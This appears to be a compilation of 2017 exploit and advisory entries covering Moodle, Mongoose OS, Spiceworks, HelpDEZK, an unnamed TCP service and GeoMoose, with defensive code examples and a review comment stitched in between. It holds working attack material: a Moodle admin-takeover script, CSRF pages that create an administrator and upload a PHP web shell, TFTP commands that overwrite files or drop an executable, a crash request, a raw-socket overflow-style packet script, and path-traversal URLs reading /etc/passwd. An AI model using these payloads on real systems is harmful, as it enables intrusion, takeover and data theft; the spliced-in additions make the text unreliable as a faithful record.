$column = 'value'; //column name to update, which holds the userid
$value = 3; // userid to set as 'siteadmins' Probably want to make it your own
update_table($url, $MoodleSession,$sesskey,$table,$rowId,$column, $value);
//reset the allversionshash config entry with a sha1 hash so the site reloads its configuration
$rowId = 375; // row id of 'allversionshash' parameter
update_table($url, $MoodleSession,$sesskey,$table,$rowId, $column, sha1(time()));
//reset the sortorder so we can see the front page again without the payload triggering
$data = array('sesskey' => $sesskey, 'sortorder[]' => 1);
httpPost($url. '/blocks/course_overview/save.php',$data, $MoodleSession,0);
//force plugincheck so we can access admin panel
httpGet($url.'/admin/index.php?cache=0&confirmplugincheck=1',$MoodleSession);
}
?>
3. Solution:
Upgrade to fixed Moodle versions: 3.2.2, 3.1.5, 3.0.9 or 2.7.19
#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/en/research/advisories/
#
#############################################################
#
# Product: Mongoose OS
# Vendor: Cesanta
# CVE ID: CVE-2017-7185
# CSNC ID: CSNC-2017-003
# Subject: Use-after-free / Denial of Service
# Risk: Medium
# Effect: Remotely exploitable
# Authors:
# Philipp Promeuschel <philipp.promeuschel@compass-security.com>
# Carel van Rooyen <carel.vanrooyen@compass-security.com>
# Stephan Sekula <stephan.sekula@compass-security.com>
# Date: 2017-04-03
#
#############################################################
Introduction:
-------------
Cesanta's Mongoose OS [1] is an open source operating system for the Internet of Things. Supported microcontrollers:
* ESP32
* ESP8266
* STM32
* TI CC3200
Additionally, Amazon AWS IoT is integrated for Cloud connectivity. Developers can write applications in C or JavaScript (the latter by using the v7 component of Mongoose OS).
Affected versions:
------------------
Vulnerable:
* <= Release 1.2
Not vulnerable:
* Patched in current dev / master branch
Not tested:
* N/A
Technical Description
---------------------
The handling of HTTP-Multipart boundary [3] headers does not properly close connections when malformed requests are sent to the Mongoose server.
This leads to a use-after-free / null-pointer dereference vulnerability that crashes the Mongoose HTTP server. As a result, the entire system is rendered unusable.
The mg_parse_multipart [2] function performs proper checks for empty boundaries, but, since the flag "MG_F_CLOSE_IMMEDIATELY" does not have any effect, mg_http_multipart_continue() is called:
--------------->8---------------
void mg_http_handler(struct mg_connection *nc, int ev, void *ev_data) {
[CUT BY COMPASS]
#if MG_ENABLE_HTTP_STREAMING_MULTIPART
if (req_len > 0 && (s = mg_get_http_header(hm, "Content-Type")) != NULL &&
s->len >= 9 && strncmp(s->p, "multipart", 9) == 0) {
mg_http_multipart_begin(nc, hm, req_len); // properly checks for empty boundary
// however, the socket is not closed, and mg_http_multipart_continue() is executed
mg_http_multipart_continue(nc);
return;
}
---------------8<---------------
In the mg_http_multipart_begin function, the boundary is correctly verified:
--------------->8---------------
boundary_len =
mg_http_parse_header(ct, "boundary", boundary, sizeof(boundary));
if (boundary_len == 0) {
/*
* Content type is multipart, but there is no boundary,
* probably malformed request
*/
nc->flags = MG_F_CLOSE_IMMEDIATELY;
DBG(("invalid request"));
goto exit_mp;
}
---------------8<---------------
However, the socket is not closed (even though the flag "MG_F_CLOSE_IMMEDIATELY" has been set), and mg_http_multipart_continue is executed.
In mg_http_multipart_continue(), the method mg_http_multipart_wait_for_boundary() is executed:
---------------8<---------------
static void mg_http_multipart_continue(struct mg_connection *c) {
struct mg_http_proto_data *pd = mg_http_get_proto_data(c);
while (1) {
switch (pd->mp_stream.state) {
case MPS_BEGIN: {
pd->mp_stream.state = MPS_WAITING_FOR_BOUNDARY;
break;
}
case MPS_WAITING_FOR_BOUNDARY: {
if (mg_http_multipart_wait_for_boundary(c) == 0) {
return;
}
break;
}
--------------->8---------------
Then, mg_http_multipart_wait_for_boundary() tries to locate the boundary string. However, this string has never been initialized, which causes c_strnstr to crash.
---------------8<---------------
static int mg_http_multipart_wait_for_boundary(struct mg_connection *c) {
const char *boundary;
struct mbuf *io = &c->recv_mbuf;
struct mg_http_proto_data *pd = mg_http_get_proto_data(c);
if ((int) io->len < pd->mp_stream.boundary_len + 2) {
return 0;
}
boundary = c_strnstr(io->buf, pd->mp_stream.boundary, io->len);
if (boundary != NULL) {
[CUT BY COMPASS]
--------------->8---------------
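The fix pattern for the flow above, as an added example that is not Mongoose's code: a minimal stand-in for mg_http_multipart_begin and mg_http_multipart_wait_for_boundary in which the caller honours the close flag and the boundary search is guarded, so a multipart request without a boundary is rejected instead of reaching the string search with an uninitialised boundary. The names mirror Mongoose's; the struct layout and flag value are assumptions.

```c
#include <string.h>

/* Same flag and state names as in Mongoose; the values here are ours. */
#define MG_F_CLOSE_IMMEDIATELY (1u << 0)
#define MAX_BOUNDARY 100
enum mp_state { MPS_BEGIN, MPS_WAITING_FOR_BOUNDARY, MPS_FINISHED };

struct conn {
    unsigned flags;
    const char *recv_buf;          /* body bytes received so far */
    size_t recv_len;
    enum mp_state state;
    char boundary[MAX_BOUNDARY + 1];
    size_t boundary_len;
};

/* Extract the boundary parameter from a Content-Type value (quoted or bare).
 * Returns its length, or 0 when it is absent or empty, which is exactly the
 * "multipart/form-data;" request in the steps to reproduce. */
size_t parse_boundary(const char *ct, char *out, size_t outlen)
{
    const char *p = strstr(ct, "boundary=");
    if (p == NULL) return 0;
    p += strlen("boundary=");
    size_t n;
    if (*p == '"') {                       /* boundary="..." */
        p++;
        const char *q = strchr(p, '"');
        if (q == NULL) return 0;
        n = (size_t) (q - p);
    } else {
        n = strcspn(p, "; \t\r\n");
    }
    if (n == 0 || n >= outlen) return 0;
    memcpy(out, p, n);
    out[n] = '\0';
    return n;
}

/* Counterpart of mg_http_multipart_begin: on a missing boundary it sets the
 * close flag, as the page's code does, and reports failure to the caller. */
int multipart_begin(struct conn *c, const char *content_type)
{
    c->boundary_len = parse_boundary(content_type, c->boundary, sizeof c->boundary);
    if (c->boundary_len == 0) {
        c->flags |= MG_F_CLOSE_IMMEDIATELY;
        return 0;
    }
    c->state = MPS_BEGIN;
    return 1;
}

/* Bounded substring search; stands in for c_strnstr. */
static const char *find_in(const char *buf, size_t len, const char *needle, size_t nlen)
{
    for (size_t i = 0; i + nlen <= len; i++)
        if (memcmp(buf + i, needle, nlen) == 0) return buf + i;
    return NULL;
}

/* Counterpart of mg_http_multipart_wait_for_boundary, guarded so an unset
 * boundary can never reach the search. Returns 1 when the boundary is found. */
int multipart_wait_for_boundary(struct conn *c)
{
    if (c->boundary_len == 0) return 0;               /* never search with no boundary */
    if (c->recv_len < c->boundary_len + 2) return 0;  /* need "--" + boundary */
    return find_in(c->recv_buf, c->recv_len, c->boundary, c->boundary_len) != NULL;
}

/* The missing check in the caller: honour MG_F_CLOSE_IMMEDIATELY after begin()
 * instead of unconditionally continuing. Returns -1 when the request is rejected
 * and the connection must be closed, 0 while waiting for more data, 1 once the
 * boundary has been seen. */
int handle_multipart_request(struct conn *c, const char *content_type)
{
    if (!multipart_begin(c, content_type) || (c->flags & MG_F_CLOSE_IMMEDIATELY)) {
        c->state = MPS_FINISHED;
        return -1;
    }
    c->state = MPS_WAITING_FOR_BOUNDARY;
    return multipart_wait_for_boundary(c) ? 1 : 0;
}
```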
Steps to reproduce
------------------
Request to HTTP server (code running on hardware device):
---------------8<---------------
POST / HTTP/1.1
Connection: keep-alive
Content-Type: multipart/form-data;
Content-Length: 1
1
--------------->8---------------
The above request results in a stack trace on the mongoose console:
---------------8<---------------
Guru Meditation Error of type LoadProhibited occurred on core 0. Exception was unhandled.
Register dump:
PC : 0x400014fd PS : 0x00060330 A0 : 0x801114b4 A1 : 0x3ffbfcf0
A2 : 0x00000000 A3 : 0xfffffffc A4 : 0x000000ff A5 : 0x0000ff00
A6 : 0x00ff0000 A7 : 0xff000000 A8 : 0x00000000 A9 : 0x00000085
A10 : 0xcccccccc A11 : 0x0ccccccc A12 : 0x00000001 A13 : 0x00000000
A14 : 0x00000037 A15 : 0x3ffbb3cc SAR : 0x0000000f EXCCAUSE: 0x0000001c
EXCVADDR: 0x00000000 LBEG : 0x400014fd LEND : 0x4000150d LCOUNT : 0xffffffff
Backtrace: 0x400014fd:0x3ffbfcf0 0x401114b4:0x3ffbfd00 0x401136cc:0x3ffbfd30 0x401149ac:0x3ffbfe30 0x40114b71:0x3ffbff00 0x40112b80:0x3ffc00a0 0x40112dc6:0x3ffc00d0 0x40113295:0x3ffc0100 0x4011361a:0x3ffc0170 0x40111716:0x3ffc01d0 0x40103b8f:0x3ffc01f0 0x40105099:0x3ffc0210
--------------->8---------------
Further debugging shows that an uninitialized string has indeed been passed to c_strnstr:
---------------8<---------------
(gdb) info symbol 0x401114b4
c_strnstr + 12 in section .flash.text
(gdb) list *0x401114b4
0x401114b4 is in c_strnstr (/mongoose-os/mongoose/mongoose.c:1720).
warning: Source file is more recent than executable.
1715 }
1716 #endif /* _WIN32 */
1717
1718 /* The simplest O(mn) algorithm. Better implementation are GPLed */
1719 const char *c_strnstr(const char *s, const char *find, size_t slen) WEAK;
1720 const char *c_strnstr(const char *s, const char *find, size_t slen) {
1721 size_t find_length = strlen(find);
1722 size_t i;
1723
1724 for (i = 0; i < slen; i++) {
(gdb) list *0x401136cc
0x401136cc is in mg_http_multipart_continue (/mongoose-os/mongoose/mongoose.c:5893).
5888 mg_http_free_proto_data_mp_stream(&pd->mp_stream);
5889 pd->mp_stream.state = MPS_FINISHED;
5890
5891 return 1;
5892 }
5893
5894 static int mg_http_multipart_wait_for_boundary(struct mg_connection *c) {
5895 const char *boundary;
5896 struct mbuf *io = &c->recv_mbuf;
5897 struct mg_http_proto_data *pd = mg_http_get_proto_data(c);
(gdb)
--------------->8---------------
Workaround / Fix:
-----------------
Apply the following (tested and confirmed) patch:
---------------8<---------------
$ diff --git a/mongoose/mongoose.c b/mongoose/mongoose.c
index 91dc8b9..063f8c6 100644
--- a/mongoose/mongoose.c
+++ b/mongoose/mongoose.c
@@ -5889,6 +5889,12 @@ static int mg_http_multipart_wait_for_boundary(struct mg_connection *c) {
return 0;
}
+ if(pd->mp_stream.boundary == NULL){
+ pd->mp_stream.state = MPS_FINALIZE;
+ LOG(LL_INFO, ("invalid request: boundary not initialized"));
+ return 0;
+ }
+
boundary = c_strnstr(io->buf, pd->mp_stream.boundary, io->len);
if (boundary != NULL) {
const char *boundary_end = (boundary + pd->mp_stream.boundary_len);
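Review bot: the NULL check is added at the consumer, mg_http_multipart_wait_for_boundary(), rather than at the point where the condition is already detected: mg_http_multipart_begin() sets MG_F_CLOSE_IMMEDIATELY when boundary_len == 0, yet its caller still invokes mg_http_multipart_continue(). Having the caller skip mg_http_multipart_continue() (or having begin() report failure) when that flag is set would stop processing at the source, so no other state of the MPS_* machine can touch an uninitialized mp_stream. Two smaller points: the new line `if(pd->mp_stream.boundary == NULL){` does not follow the file's spacing (compare `if (boundary != NULL) {` two lines below), and logging an attacker-triggerable malformed request at LL_INFO will be noisy on an internet-exposed device; LL_DEBUG fits better.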
--------------->8---------------
The patch has been merged into Mongoose OS on github.com on 2017-04-03 [4].
Timeline:
---------
2017-04-03: Coordinated public disclosure date
2017-04-03: Release of patch
2017-03-20: Initial vendor response, code usage sign-off
2017-03-19: Initial vendor notification
2017-03-19: Assigned CVE-2017-7185
2017-03-11: Confirmation and patching Philipp Promeuschel, Carel van Rooyen
2017-03-08: Initial inspection Philipp Promeuschel, Carel van Rooyen
2017-03-08: Discovery by Philipp Promeuschel
References:
-----------
[1] https://www.cesanta.com/
[2] https://github.com/cesanta/mongoose/blob/66a96410d4336c312de32b1cf5db954aab9ee2ec/mongoose.c#L7760
[3] http://www.ietf.org/rfc/rfc2046.txt
[4] https://github.com/cesanta/mongoose-os/commit/042eb437973a202d00589b13d628181c6de5cf5b
[+] Credits: John Page AKA HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SPICEWORKS-IMPROPER-ACCESS-CONTROL-FILE-OVERWRITE.txt
[+] ISR: APPARITIONSEC
Vendor:
==================
www.spiceworks.com
Product:
=================
Spiceworks - 7.5
Spiceworks provides network inventory and monitoring of all the devices on the network by discovering IP-addressable devices.
It can be configured to provide custom alerts and notifications based on various criteria. It also provides a ticketing system,
a user portal, an integrated knowledge base, and mobile ticket management.
Vulnerability Type:
==============================================
Improper Access Control File Overwrite / Upload
CVE Reference:
==============
CVE-2017-7237
Security Issue:
================
The Spiceworks TFTP Server, as distributed with Spiceworks Inventory 7.5, allows remote attackers to access the Spiceworks "data\configurations"
directory by leveraging the unauthenticated nature of the TFTP service for all clients who can reach UDP port 69. This allows remote attackers to
overwrite files within the Spiceworks configurations directory, if the targeted file name is known or guessed.
Remote attackers who can reach UDP port 69 can also write arbitrary files into "data\configurations". This can become remote
code execution if, for example, an executable file (EXE, BAT) is dropped there and is later opened and run by an unsuspecting
Spiceworks user.
References - released April 3, 2017:
====================================
https://community.spiceworks.com/support/inventory/docs/network-config#security
Proof:
=======
1) Install Spiceworks
2) c:\>tftp -i VICTIM-IP PUT someconfig someconfig
3) Original someconfig gets overwritten
OR
Arbitrary file upload
c:\>tftp -i VICTIM-IP PUT Evil.exe Evil.exe
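Added example, not Spiceworks code: the write exchange behind "tftp -i VICTIM-IP PUT Evil.exe Evil.exe", modelled in memory with RFC 1350 packets so it runs without a network. TFTP has no notion of a user or password, so the only control a server can apply is a policy on the requested file name; the WriteServer class takes such a policy and defaults to accepting everything, which is the behaviour described for the Spiceworks service above. The allowlist of names and the class and function names are constructed for this example.

```python
import struct

# Added example, not Spiceworks code: an in-memory RFC 1350 write exchange.
# TFTP has no authentication, so the only thing between a client that can
# reach UDP/69 and the server's directory is the server's own name policy.

RRQ, WRQ, DATA, ACK, ERROR = 1, 2, 3, 4, 5
BLOCK = 512          # DATA payload size; a shorter block ends the transfer
ERR_ACCESS = 2       # "Access violation"
ERR_ILLEGAL = 4      # "Illegal TFTP operation"


def build_wrq(filename, mode="octet"):
    return struct.pack("!H", WRQ) + filename.encode() + b"\0" + mode.encode() + b"\0"


def build_data(block, payload):
    return struct.pack("!HH", DATA, block) + payload


def build_ack(block):
    return struct.pack("!HH", ACK, block)


def build_error(code, message):
    return struct.pack("!HH", ERROR, code) + message.encode() + b"\0"


def parse(pkt):
    """Return (opcode, fields) for one TFTP packet."""
    (op,) = struct.unpack("!H", pkt[:2])
    if op in (RRQ, WRQ):
        name, mode, _ = pkt[2:].split(b"\0", 2)
        return op, (name.decode(), mode.decode())
    if op == DATA:
        return op, (struct.unpack("!H", pkt[2:4])[0], pkt[4:])
    if op == ACK:
        return op, (struct.unpack("!H", pkt[2:4])[0],)
    if op == ERROR:
        return op, (struct.unpack("!H", pkt[2:4])[0], pkt[4:].rstrip(b"\0").decode())
    raise ValueError("unknown opcode %d" % op)


class WriteServer:
    """Server side of a write. policy(name) decides which names may be written;
    the default accepts anything, which is the behaviour described above."""

    def __init__(self, policy=lambda name: True):
        self.policy = policy
        self.files = {}      # completed uploads: name -> bytes
        self._name = None
        self._buf = b""
        self._expect = 1

    def handle(self, pkt):
        op, fields = parse(pkt)
        if op == WRQ:
            name = fields[0]
            if not self.policy(name):
                return build_error(ERR_ACCESS, "Access violation")
            self._name, self._buf, self._expect = name, b"", 1
            return build_ack(0)
        if op == DATA and self._name is not None:
            block, payload = fields
            if block != self._expect:
                return build_error(ERR_ILLEGAL, "unexpected block %d" % block)
            self._buf += payload
            self._expect += 1
            if len(payload) < BLOCK:     # last block: commit the file
                self.files[self._name] = self._buf
                self._name = None
            return build_ack(block)
        return build_error(ERR_ILLEGAL, "Illegal TFTP operation")


def put(server, filename, data):
    """Client side of 'tftp -i HOST PUT filename'; True when the server stored it."""
    op, fields = parse(server.handle(build_wrq(filename)))
    if op != ACK or fields[0] != 0:
        return False
    block, offset = 1, 0
    while True:
        chunk = data[offset:offset + BLOCK]
        op, fields = parse(server.handle(build_data(block, chunk)))
        if op != ACK or fields[0] != block:
            return False
        if len(chunk) < BLOCK:
            return True
        block, offset = block + 1, offset + BLOCK


if __name__ == "__main__":
    open_server = WriteServer()
    print("open server stored Evil.exe:", put(open_server, "Evil.exe", b"MZ" + b"\0" * 600))
    strict = WriteServer(policy=lambda name: name in {"switch01.cfg"})  # allowlist (assumed names)
    print("allowlisting server stored Evil.exe:", put(strict, "Evil.exe", b"MZ"))
```

Note that the policy is the whole of the control: a real deployment of a TFTP-based backup service should bind the listener to the interface the managed devices use, restrict UDP/69 to their addresses at the host firewall, and accept only names it expects from those devices.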
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
======================================================================
Vendor Notification: March 13, 2017
Sent vendor PoC: March 23, 2017
Request status : March 30, 2017
Vendor reply: "We are still working on this" March 30, 2017
Vendor reply :"Thanks for bringing this to our attention"
and releases basic security note of issue on website : April 3, 2017
April 5, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
# Exploit Title: Multiple CSRF Remote Code Execution Vulnerability on HelpDEZK 1.1.1
# Date: 05-April-2017
# Exploit Author: @rungga_reksya, @yokoacc, @AdyWikradinata, @dickysofficial, @dvnrcy
# Vendor Homepage: http://www.helpdezk.org/
# Software Link: https://codeload.github.com/albandes/helpdezk/zip/v1.1.1
# Version: 1.1.1
# Tested on: Windows Server 2012 Datacenter Evaluation
# CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N (9.1 - CRITICAL)
# CVE: CVE-2017-7446 and CVE-2017-7447
I. Background:
HelpDEZk is a powerful software package that manages requests/incidents. It has all the features needed for efficient workflow management of all processes involved in service execution. This control covers internal demands as well as outsourced services. HelpDEZk can be used in any area of a company, serving as support for the shared service center concept; beyond the ability to log all processes and maintain the request history, it can pass requests through many approval levels. HelpDEZk combines advanced management resources with extremely easy use. Simple and intuitive screens make the day-to-day easier for your team, speeding up procedures and saving a lot of time. It is developed in object-oriented PHP with the MVC architecture and uses the SMARTY template system. For the JavaScript, jQuery is used.
II. Description:
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
HelpDEZK defines the following person types (the typeuser value in the forms below):
admin = 1
user = 2
operator = 3
costumer = 4
partner = 5
group = 6
III. Exploit:
—> The first CSRF target is: "/admin/home#/person/"
(Admin - Records - People & Companies)
An attacker without any account can obtain admin privileges: when a logged-in admin is made to submit the form below (CSRF), a new person with typeuser=1 (admin) is created with credentials the attacker chose. This is the PoC page that creates the admin account:
<html>
<!-- CSRF PoC on insert menu people -->
<body>
<form action="http://192.168.228.186/helpdezk-1.1.1/admin/person/insertNatural" method="POST">
<input type="hidden" name="login" value="testing" />
<input type="hidden" name="logintype" value="3" /> <!-- Type Login = 3 (HD) -->
<input type="hidden" name="password" value="testing" />
<input type="hidden" name="name" value="testing" />
<input type="hidden" name="email" value="testing@local.com" /> <!-- e.g: testing@local.com -->
<input type="hidden" name="company" value="60" />
<input type="hidden" name="department" value="1" />
<input type="hidden" name="phone" value="" />
<input type="hidden" name="branch" value="" />
<input type="hidden" name="mobile" value="" />
<input type="hidden" name="country" value="1" />
<input type="hidden" name="state" value="1" />
<input type="hidden" name="cpf" value="" />
<input type="hidden" name="city" value="1" />
<input type="hidden" name="neighborhood" value="Choose" />
<input type="hidden" name="zipcode" value="" />
<input type="hidden" name="typestreet" value="1" />
<input type="hidden" name="address" value="Choose" />
<input type="hidden" name="number" value="" />
<input type="hidden" name="complement" value="" />
<input type="hidden" name="typeuser" value="1" /> <!-- admin privilege -->
<input type="hidden" name="location" value="" />
<input type="hidden" name="vip" value="N" />
<input type="hidden" name="filladdress" value="N" />
<input type="hidden" name="dtbirth" value="" />
<input type="hidden" name="gender" value="M" />
<input type="hidden" name="time_value" value="" />
<input type="hidden" name="overtime" value="" />
<input type="hidden" name="changePassInsert" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
—> The second CSRF target is: /admin/home#/logos/
(Admin - Config - Logos)
Even a user with the lowest privilege level can obtain remote code execution by uploading a web shell through the logos module (Page Header, Login Page and Reports logo). HelpDEZK does not restrict the extension of the uploaded logo file; the module is meant for admins only, but the upload requests below succeed for any logged-in user.
If you only have a low-privilege account, log in to the application first, then open one of the following pages:
<!-- CSRF PoC - Login Page Logo -->
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.228.186/helpdezk-1.1.1/admin/logos/upload2", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1883328331133778598415248998");
xhr.withCredentials = true;
var body = "-----------------------------1883328331133778598415248998\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"index.php\"\r\n" +
"Content-Type: text/php\r\n" +
"\r\n" +
"\x3c?php\n" +
"\n" +
"if(isset($_REQUEST[\'cmd\'])){\n" +
" echo \"\x3cpre\x3e\";\n" +
" $cmd = ($_REQUEST[\'cmd\']);\n" +
" system($cmd);\n" +
" echo \"\x3c/pre\x3e\";\n" +
" die;\n" +
"}\n" +
"\n" +
"?\x3e\r\n" +
"-----------------------------1883328331133778598415248998--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
————
<!-- CSRF PoC Page Header Logo -->
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.228.186/helpdezk-1.1.1/admin/logos/upload", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------11525671838941487412014811928");
xhr.withCredentials = true;
var body = "-----------------------------11525671838941487412014811928\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\r\n" +
"Content-Type: text/php\r\n" +
"\r\n" +
"\x3c?php\n" +
"\n" +
"if(isset($_REQUEST[\'cmd\'])){\n" +
" echo \"\x3cpre\x3e\";\n" +
" $cmd = ($_REQUEST[\'cmd\']);\n" +
" system($cmd);\n" +
" echo \"\x3c/pre\x3e\";\n" +
" die;\n" +
"}\n" +
"\n" +
"?\x3e\r\n" +
"-----------------------------11525671838941487412014811928--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
———————
<!-- CSRF PoC - Reports Logo -->
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.228.186/helpdezk-1.1.1/admin/logos/upload3", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1789373681642463979344317937");
xhr.withCredentials = true;
var body = "-----------------------------1789373681642463979344317937\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"index.php\"\r\n" +
"Content-Type: text/php\r\n" +
"\r\n" +
"\x3c?php\n" +
"\n" +
"if(isset($_REQUEST[\'cmd\'])){\n" +
" echo \"\x3cpre\x3e\";\n" +
" $cmd = ($_REQUEST[\'cmd\']);\n" +
" system($cmd);\n" +
" echo \"\x3c/pre\x3e\";\n" +
" die;\n" +
"}\n" +
"\n" +
"?\x3e\r\n" +
"-----------------------------1789373681642463979344317937--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
————
If the upload succeeded, the file is stored under:
http://example.com/helpdezk-1.1.1/app/uploads/logos/
and PWN ^_^
http://example.com/helpdezk-1.1.1/app/uploads/logos/login_index.php?cmd=ipconfig
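This is an added example, not HelpDEZK code: a Python version of the validation the three upload handlers (/admin/logos/upload, upload2, upload3) would need, run against the request the PoC above sends (file name index.php, Content-Type text/php, PHP body). The function name, the allowlist of image types and the size limit are choices made for this example. A double-extension name such as shell.php.png passes only if the bytes really are a PNG, and the file is then stored under a server-chosen name, so the client's name never reaches the filesystem.

```python
import os
import secrets

# Added example, not HelpDEZK code: server-side checks for a logo upload,
# applied to the request the CSRF PoC above sends.

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"

# extension -> (magic bytes a real image of that type starts with, declared type)
IMAGE_TYPES = {
    ".png": (PNG_MAGIC, "image/png"),
    ".jpg": (b"\xff\xd8\xff", "image/jpeg"),
    ".jpeg": (b"\xff\xd8\xff", "image/jpeg"),
    ".gif": (b"GIF8", "image/gif"),
}
MAX_LOGO_BYTES = 512 * 1024   # assumed limit for a logo


def check_logo_upload(filename, content_type, data):
    """Return (accepted, reason, stored_name); stored_name is chosen by the server."""
    base = os.path.basename(filename.replace("\\", "/"))   # strip any directory part
    ext = os.path.splitext(base)[1].lower()
    if ext not in IMAGE_TYPES:
        return False, "extension %r is not an allowed image type" % ext, None
    magic, expected_type = IMAGE_TYPES[ext]
    if content_type != expected_type:
        return False, "declared Content-Type %r does not match %s" % (content_type, ext), None
    if not data.startswith(magic):
        return False, "file content is not a %s image" % ext, None
    if len(data) > MAX_LOGO_BYTES:
        return False, "file too large", None
    # Never keep the client-supplied name: it must not decide the stored path or type.
    return True, "ok", "logo_%s%s" % (secrets.token_hex(8), ext)


# The body the PoC uploads (the PHP shell from the advisory above).
POC_BODY = (b"<?php\n\nif(isset($_REQUEST['cmd'])){\n  echo \"<pre>\";\n"
            b"  $cmd = ($_REQUEST['cmd']);\n  system($cmd);\n  echo \"</pre>\";\n"
            b"  die;\n}\n\n?>")

if __name__ == "__main__":
    print(check_logo_upload("index.php", "text/php", POC_BODY))
    print(check_logo_upload("logo.png", "image/png", PNG_MAGIC + b"\0" * 32))
```

The three layers are independent: the extension allowlist rejects index.php outright, the magic-byte check rejects PHP source that was renamed to .png, and the server-chosen name removes the client's influence over the path. The upload endpoint still needs a CSRF token and an admin-only authorization check, which are separate from content validation.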
IV. Thanks to:
- Alloh SWT
- MyBoboboy
- Komunitas IT Auditor & IT Security
Refer:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)
http://rungga.blogspot.co.id/2017/04/multiple-csrf-remote-code-execution.html
https://github.com/albandes/helpdezk/issues/2
import socket
import binascii

# Target host and port are hard-coded as in the original PoC.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.connect(("10.101.0.85", 8400))


def sr(p=None, r=None):
    """Send the hex-encoded packet p (if given) and, if r is set, read one reply."""
    if p:
        print("sending %d bytes: %s " % (len(p) // 2, p))
        s.send(binascii.a2b_hex(p))
    if r:
        try:
            data = s.recv(1024 * 2)
        except socket.timeout:
            print("no reply within timeout")
            return
        print("received %d bytes: %s " % (len(data), binascii.b2a_hex(data).decode()))


# Packet 1: first message of the exchange, raw hex as captured.
pkt1 = "0000003800000010000000100000000f00000000000000000000000000000000000000000000000000000000000000010000000000000000"
pkt1 += "0000100309000101090000000000ffe80000000800010000"
pkt1 += "0000000400000004"
# Packet 2: contains the ASCII string "cvd.exe" (length byte 07 followed by 6376642e657865).
pkt2 = "0000100309000509000000090000ffe800000036"+"00018016"
pkt2 += "02000000"+"09050009"+"c14d4d0"+"000000000000000003a793102076376642e6578656a231a0200429d750500989796059c16e042"+"fd00b417"
# Packet 3: the ASCII string "SSLcLnT", a 0x000b length prefix and the string
# "win2012-02\0", followed by 0xd0 bytes of 'A' (0x41) filler.
pkt3 = "53534c634c6e54"+"01"+"000b"+"77696e323031322d303200"+"03"+"0000000300000001"
p = "41"*0xd0
pkt3 += p

sr(pkt1, 1)
sr(pkt2, 1)
sr(pkt3, 1)
s.close()
# Exploit Title: GeoMoose <= 2.9.2 Local File Disclosure
# Exploit Author: Sander 'dsc' Ferdinand
# Date: 2017-03-04
# Version: <= 2.9.2
# Blog: https://ced.pwned.systems/advisories-geomoose-local-file-disclosure-2-9-2.html
# Vendor Homepage: geomoose.org
# Reported: 4-3-2017
# Vendor response: http://osgeo-org.1560.x6.nabble.com/Geomoose-users-GeoMoose-Security-Issue-td5315873.html
# Software Link: https://github.com/geomoose/geomoose
# Tested on: Windows/Linux
# CVE : none
/php/download.php?id=foo/.&ext=/../../../../../../../etc/passwd
/php/download.php?id=foo/.&ext=/../../../../../../../WINDOWS/system32/drivers/etc/hosts
